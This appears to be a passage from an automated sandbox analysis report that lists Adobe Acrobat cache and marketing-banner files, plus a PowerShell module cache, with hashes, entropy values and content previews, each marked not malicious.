                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfBD2G6UpnrPeUkwRe9:YvXKXBO+TLUcs/GR22cUkee9
                                                              MD5:D72A085D91D49ECB35C0A73B683E0D35
                                                              SHA1:A998CE15A758CB8BA29B9B002BB4CBE246709ECE
                                                              SHA-256:6F5855E2A19E8DE14EA3C4DF3B5DFAC0F0A0EFD7B3C30A68C91DDC6A8E59F0E6
                                                              SHA-512:B20D55BE12D4E91B5225C0E0C7E4ECE8DBE0A56F256B32CA416DBBFD9D4596BE4319A3F9A595054881D2A27F5CDB3BE73190D5CFB59FC38701BC3E20F62FB7E8
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):285
                                                              Entropy (8bit):5.320283180787527
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfPmwrPeUkwRe9:YvXKXBO+TLUcs/GH56Ukee9
                                                              MD5:A571C9DDAFD5F9719A046D8C6C1220FD
                                                              SHA1:A2667DD49B25DA4F68B384F979954B41E4BFE912
                                                              SHA-256:2052171D1EDDDD55C062AD2609C37DBAAB126F5DADB67FA2CC3E1CDFA16BCEAA
                                                              SHA-512:C242D2146483002B9AEFFA6AA99C93BF787201E8BEF923D9FD917CC9DF104D77854ECFBE4F9B1FA3909B5C5C11EA77CEBE980F67D8D3548E589F79F589490755
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1123
                                                              Entropy (8bit):5.688705460315037
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XBnTL5skpLgE9cQx8LennAvzBvkn0RCmK8czOCCSz:YvE/Bhgy6SAFv5Ah8cv/z
                                                              MD5:6DF09CE77623813A61445A8AA3473D3D
                                                              SHA1:3873EC0E3F8C9563DB6C553F4CDCD64D345DCA07
                                                              SHA-256:D495AC7F49402B8F0678FD6A567FB37047F300072168058D1FFD959D2AC04DD4
                                                              SHA-512:187A1BE6D0299C63A1E7B3C78735752C7D361483371E68D06D233D1664712FC21DA0493FDFDD1BA684FDF972813137337CAD66D84909F48DBC74DD0E1B34FAE2
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):289
                                                              Entropy (8bit):5.268227390023123
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJf8dPeUkwRe9:YvXKXBO+TLUcs/GU8Ukee9
                                                              MD5:856CAE42E2620872B494BD144DB2E6FD
                                                              SHA1:B45130561F406A241B208C1E0E91F3AEBCC450FD
                                                              SHA-256:FBD64891A9E32E0454F07EBE22B9A0F3916C3F5D108B42AD53406117AFA5E1BB
                                                              SHA-512:C3F98CFB7B1CD82F51AD62ACC88B6AEC801EB0162E41FF98F93934B33C1AE759F8EF45DB0F257BCFD393A9BFCD14530294557DC2C3E3A85776D68EB369C8025B
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):292
                                                              Entropy (8bit):5.270962086808989
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfQ1rPeUkwRe9:YvXKXBO+TLUcs/GY16Ukee9
                                                              MD5:637B25AF1B9C9F7BE522820B7D8D4729
                                                              SHA1:63EF1258B64C0349E0D98BB91EB8B612480F6D58
                                                              SHA-256:E412305D480328D2F024B1AD66EDF1A3F5510267FC6E3210C5474641DCE88488
                                                              SHA-512:71EE2757C019EFB2B20E8C39DDC6BBFE4179E4C84C1983384656C2B042A654735491416C475B4A7F32E50A1CDC729EBA60C2CD68E4B6D5B70DF1ECEE91A13DD0
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):289
                                                              Entropy (8bit):5.277656074589669
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfFldPeUkwRe9:YvXKXBO+TLUcs/Gz8Ukee9
                                                              MD5:60246A25BA45294413BDA134824D611A
                                                              SHA1:4E25E4FC9969B594336D243470E19C0835BB87D2
                                                              SHA-256:53C232C29559FE8987419F7F20EB5BEE1CAB0DFA5E696FD958E6A10CC9B7FA97
                                                              SHA-512:747F070D888603AF7D1D4AB9E51AE330313002BB96D2BCDE555E88771FA7900F25C857623D4AB567EBEE72286D89AC467A52EABE0792DCFF25818783BF2EFF2B
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):295
                                                              Entropy (8bit):5.2937146192471625
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfzdPeUkwRe9:YvXKXBO+TLUcs/Gb8Ukee9
                                                              MD5:16074B8DC74088F39A03AFFFB96C93AA
                                                              SHA1:6E5964444D79E423D0D0A230CEA37E31A3D0E9EA
                                                              SHA-256:1DBD7837AFE1EAB602BFAF0BD57D0E8F693EF3DBB5AB23FC7D4C0FC810EF7F82
                                                              SHA-512:E7E61F1CBD9DEB0A66607D6FB358EC51AF0293DC7F1B51AD5969EE61110BFE7B46AA171B3FA05FAA0D09307FC77264BA628BDFB4B91BB1B88170EA6A63BED1BF
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):289
                                                              Entropy (8bit):5.274103334320961
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfYdPeUkwRe9:YvXKXBO+TLUcs/Gg8Ukee9
                                                              MD5:D8A50C6496ADD38D6003CEAB6B3B0368
                                                              SHA1:76818B82721402AB9338EC87BF420BAFE2146B26
                                                              SHA-256:15E09955E802A51B4C061ED74CDED6AF4EFBEFACE33730B427653D2145BB3D35
                                                              SHA-512:8C5EFCCA942F7482290B1B1ABD644E7A883E7E11AD5CE6A01889686F173634990F03BE14E668DFE664F1A656AE2CDABA0B041634892751029D928E31CB54DC8E
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):284
                                                              Entropy (8bit):5.2605466209208345
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJf+dPeUkwRe9:YvXKXBO+TLUcs/G28Ukee9
                                                              MD5:853819AFC5432486CE9E2EF2340B67AD
                                                              SHA1:0205987E8BF13EF73E24C5CB9B06C2B5F9968650
                                                              SHA-256:DF3486F3013F48B136E8AF688A0D8208E4CED74FF0148E6AE1E21D26CC3993E9
                                                              SHA-512:22807CAC3B31525E56CBD751E5F1ED5FAB5BED22A0BF713072ABCF6CFCFB05660536CC4F0D74E10C3DB37AD2F109E0DB03737764CD6E09AF4602BFC60D024425
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):291
                                                              Entropy (8bit):5.257828415951381
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfbPtdPeUkwRe9:YvXKXBO+TLUcs/GDV8Ukee9
                                                              MD5:D6B7AD4AC099D8B81CB29458EF63A1E1
                                                              SHA1:D3B92C4801A38691EF0A72B767A25201BF032822
                                                              SHA-256:43862BB749D15160489172726651E031A1DA3B8310D0C3098A7F291814CA4389
                                                              SHA-512:7EE335EBC25F44190135CAA75CC1B72E7A2BD41E733E4DCC7704310D7A6A3ACF9C279874F2BD2BB41C8D100DE35EA0BAB7D9FCF2C7EBC5188A77D199F2B9D232
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):287
                                                              Entropy (8bit):5.261147153326143
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJf21rPeUkwRe9:YvXKXBO+TLUcs/G+16Ukee9
                                                              MD5:5C0132DAA3F01FCAB115B881FE450650
                                                              SHA1:744B6A15FEF32A7CAB31AB49655414BDD518F07A
                                                              SHA-256:13B3ADFB89C9821827478B235967FA16929C065CAEF56E9DE83A5BAFD94214BB
                                                              SHA-512:7CAD27E668AEB6EC21BEE4E0CD139569BFF5746280CCD3105929CC028B2D0668426DDBA69896DD383A029E6C51C2E5FE4B037FEBFF4ED49CC23BE93E08507DBB
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1090
                                                              Entropy (8bit):5.665206969351102
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XBnTL5sAamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSz:YvE/NBgkDMUJUAh8cvMz
                                                              MD5:77DAB757DEEBCDA4E1CAAAB3DA2A0DDD
                                                              SHA1:6F7B409284B12A992178E53C3695EBFB96BB06DD
                                                              SHA-256:840234232FBAE7E82EE16514262AA2DC51062962612C995CC3523AE8D625AD10
                                                              SHA-512:714462599D642AF074725D4BF27692BF9078488475B1E74DDECE9B5F714DF4C5D7B5AFB210A94DD1DC30075FD8EE078855E42405BE99A1CE349528BDA98841DE
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):286
                                                              Entropy (8bit):5.238217592221981
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfshHHrPeUkwRe9:YvXKXBO+TLUcs/GUUUkee9
                                                              MD5:270F304CACB1D05495BC219094387FFD
                                                              SHA1:0BE102C10BC2C336FEB4E15781954D83CF189984
                                                              SHA-256:8A908699C7984E4B422A62F35537A984542FC1C8963CA653ACCFFDDAB956DA79
                                                              SHA-512:817BF417212525FD1C12772745FE319930414244619E38B001801312A38A59BD162D3D6F7AE7DB161A0882C3C20173415E34F176F13111C3D9F4D23DEF234083
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):282
                                                              Entropy (8bit):5.246965590328122
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJTqgFCrPeUkwRe9:YvXKXBO+TLUcs/GTq16Ukee9
                                                              MD5:07C8E2511FE65F9BB9DA2B1CE7AF87B5
                                                              SHA1:DD56D662FA42D18AE1AE1E290C33E45C49396343
                                                              SHA-256:39DE479AF3CCB89FBEC42F63AC19C2F9354CB96E0CADC9469E31BBEB2E2233DD
                                                              SHA-512:5FE2724947E829999965DA3492ADBCCF8E1040BFEEEC0A439C6278909E1D0B8A6FD1103B7A311D4D5E234EF004427322A73AC6073D57324FDF5F65F042450C8D
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4
                                                              Entropy (8bit):0.8112781244591328
                                                              Encrypted:false
                                                              SSDEEP:3:e:e
                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                              Malicious:false
                                                              Preview:....

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):2814
                                                              Entropy (8bit):5.143950224243171
                                                              Encrypted:false
                                                              SSDEEP:48:YwvGP5dCxqP+VuQ+c3t/RaMHOb85oRRA9w43:mRPDQ+q7v5DD
                                                              MD5:E864EB2E3E26DBCAE628AB336FF5A3FF
                                                              SHA1:0AAE4E13B50B6C3BB644DDB0BD4EF3B3F5358067
                                                              SHA-256:19D80B24ADA6C4226B48976EDAEED04460FB255FF06D65956CC74D262F8C1ED7
                                                              SHA-512:E7467D058F5EB7FDA60B6FDF690057B1B88F07B9353D44856E882867B4FDC29D2618E706E874C5BE2A4CC8ED83D1A0CC96A8E3248E501F1FD32EDCDE497F0759
                                                              Malicious:false
                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ebc67c77b5892952942cb67413b21099","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734605792000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"8db10abfa84b7ed5e7b3c15af6207903","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734605792000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"eccbf3092cdc076b87716179b6863698","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":289,"ts":1734605792000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"bb49a32d4907f24ff9e0ba57a89dde64","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734605792000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"c64c937a708137bcf84bd73602eb2caa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734605792000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7ad66b931d8128e719aae035237a7703","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                              Category:dropped
                                                              Size (bytes):12288
                                                              Entropy (8bit):1.1458694936830254
                                                              Encrypted:false
                                                              SSDEEP:24:TLhx/XYKQvGJF7ursuRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHN:TFl2GL7mswXc+XcGNFlRYIX2v3kN
                                                              MD5:DC5EA9BCE41723D41591BA6DC370718C
                                                              SHA1:7E463970804AAAE9C5F6B93C3C12E47C35A07C10
                                                              SHA-256:BE575EA673B15229E13CDF10CEF1029FB537BF56C3A70D14F22D9204EEDF38BE
                                                              SHA-512:C7037DD972E4C1636E1EB3CBC8A4C71DBA13C31D5ED0F3E280885157E27B618E5B6D60E5DD6D1BE370776436631ACF6FA07F731DF09ACDCD8186B445DE16EC37
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite Rollback Journal
                                                              Category:dropped
                                                              Size (bytes):8720
                                                              Entropy (8bit):1.5496832834098873
                                                              Encrypted:false
                                                              SSDEEP:24:7+tcUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxLqLxx/XYKQ1:7MRXc+XcGNFlRYIX2v2qVl2GL7msG
                                                              MD5:6392364EDEC3941CF644A9F988BA88D2
                                                              SHA1:BFDDA9F54F60BBB0AAEBCAE46A46D003CF48958C
                                                              SHA-256:2E25D5594415A860FF9AFA038F2E69CB6A478FFDA75FCF982A74E5D1DE55FE25
                                                              SHA-512:21D65EC3DA691F5221248EB2318BBAAF2B21BF2D08A3A30950BE183A9DCAE51CFD02A405CE84947CDCAA8E8FD0943F98DE090E5DFCF7FD66EF779FA7D783A046
                                                              Malicious:false
                                                              Preview:.... .c.....nu............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):66726
                                                              Entropy (8bit):5.392739213842091
                                                              Encrypted:false
                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgKSk7On0ouTRZM4LrXyJZleIQ4K4Yyu:6a6TZ44ADEKSCOn0ouTRXvJ4fK
                                                              MD5:751110CFCCA4EE5954B756A4680C691C
                                                              SHA1:8A29FA93B1663A2717BF889E6A0071B8EA91CBBE
                                                              SHA-256:E15019DCEF8A926B7E06456E064C1025CB81316211876F02A9173A950B4EB807
                                                              SHA-512:6E89DB893B1D7AA999B3F6DA4664D0E86110A56D9C9BC7583052A5EE5D7B29C5450EE33D93CDCBC6B70E7C1C4906106E1166FE96F2941D012D9EFCFFE00D42EE
                                                              Malicious:false
                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):11608
                                                              Entropy (8bit):4.890472898059848
                                                              Encrypted:false
                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                              Malicious:false
